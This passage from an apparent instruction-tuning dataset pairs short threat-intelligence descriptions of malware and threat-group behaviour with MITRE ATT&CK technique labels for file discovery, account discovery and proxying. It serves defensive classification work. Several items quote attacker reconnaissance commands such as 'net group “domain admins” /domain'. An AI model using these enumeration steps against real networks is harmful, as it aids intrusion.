adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HOPLIGHT has been observed enumerating system drives and partitions.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Penquin can use the command code \"\"do_vslist\"\" to send file names, size, and status to C2.\"", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Seasalt has the capability to identify the drive type on a victim.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Shamoon attempts to access the \"\"ADMIN$\"\", \"\"C$\\Windows\"\", \"\"D$\\Windows\"\", and \"\"E$\\Windows\"\" shares on the victim with its current privileges.\"", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SynAck checks its directory location in an attempt to avoid launching in a sandbox.", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TSCookie has the ability to discover drive information on the infected host.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper has monitored files' modified time.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT29 obtained a list of users and their roles from an Exchange server using \"\"Get-ManagementRoleAssignment\"\".\"", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT1 used the commands \"\"net localgroup\"\",\"\"net user\"\", and \"\"net group\"\" to find accounts on the system.\"", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT32 enumerated administrative users using the commands \"\"net localgroup administrators\"\".\"", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bankshot gathers domain and account names/information through process monitoring.", + "output": "- T1087.001: Account Discovery - Local Account\n- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BitPaymer can enumerate the sessions for each user logged onto the infected host.", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Commands under \"\"net user\"\" can be used in Net to gather information about and manipulate user accounts.\"", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation CuckooBees, the threat actors used the `net user` command to gather account information.", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Elise executes \"\"net user\"\" after initial communication is made to the remote server.\"", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HyperStack can enumerate all account names on a remote share.", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kazuar gathers information on local groups and members on the victim\u2019s machine.", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ke3chang performs account discovery using commands such as \"\"net localgroup administrators\"\" and \"\"net group \"\"REDACTED\"\" /domain\"\" on specific permissions groups.\"", + "output": "- T1087.001: Account Discovery - Local Account\n- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MURKYTOP has the capability to retrieve information about users on remote hosts.", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"OilRig has run \"\"net user\"\", \"\"net user /domain\"\", \"\"net group \u201cdomain admins\u201d /domain\"\", and \"\"net group \u201cExchange Trusted Subsystem\u201d /domain\"\" to get account listings on a victim.\"", + "output": "- T1087.001: Account Discovery - Local Account\n- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PUNCHBUGGY can gather user names.", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.", + "output": "- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT41 used a tool called CLASSFON to covertly proxy network communications.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gazer identifies a proxy server if it exists and uses it to make HTTP requests.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has leverage NordVPN for its egress points when targeting intended victims.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POLONIUM has used the AirVPN service for operational activity.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoshC2 contains modules that allow for use of proxies in command and control.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SombRAT has the ability to use an embedded SOCKS proxy in C2 communications.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WarzoneRAT has the capability to act as a reverse proxy.", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 used custom tools to create SOCK5 and custom protocol proxies between infected hosts.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CHOPSTICK used a proxy server between victims and the C2 server.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FatDuke can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Higaisa discovered system proxy settings and used them if available.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MiniDuke can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Operation Wocao can proxy traffic through multiple infected systems.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pay2Key has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"ZJ\"\" variant of BACKSPACE allows \"\"ZJ link\"\" infections with Internet access to relay traffic from \"\"ZJ listen\"\" to a command server.\"", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Winnti for Windows HTTP/S C2 mode can make use of a local proxy.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Turla has compromised internal network systems to act as a proxy to forward traffic to C2.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An APT3 downloader establishes SOCKS5 connections for its initial C2.", + "output": "- T1090.002: Proxy - External Proxy\n- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in 